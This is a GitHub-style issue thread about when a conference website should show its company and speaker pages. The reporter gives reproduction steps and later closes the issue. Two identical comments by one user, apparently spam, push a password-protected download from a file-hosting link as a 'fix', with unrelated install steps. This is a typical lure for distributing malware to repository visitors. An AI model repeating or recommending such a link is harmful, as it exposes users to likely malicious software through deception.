### ISSUE TITLE
Bug: Decide when to show the front facing speakers/company pages

### ISSUE THREAD

**Issue by v-stamenova** [HZ-HBO-ICT/it-conference#530]
**Describe the bug**
Currently it is possible to see the companies directly after a seed a.k.a without activating an edition. On the other side speakers do not show unless programme is released. 

Should we do something like a middle ground and show companies and speakers as soon as they're approved and an edition is activated @TimKardol, @IGORnvk?

**To Reproduce**
1. Refresh database
2. Go to companies and see the companies
3. Log in as admin and activate edition
4. See that speakers still do not appear

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by v-stamenova** [comment]
It seems to no longer be an issue
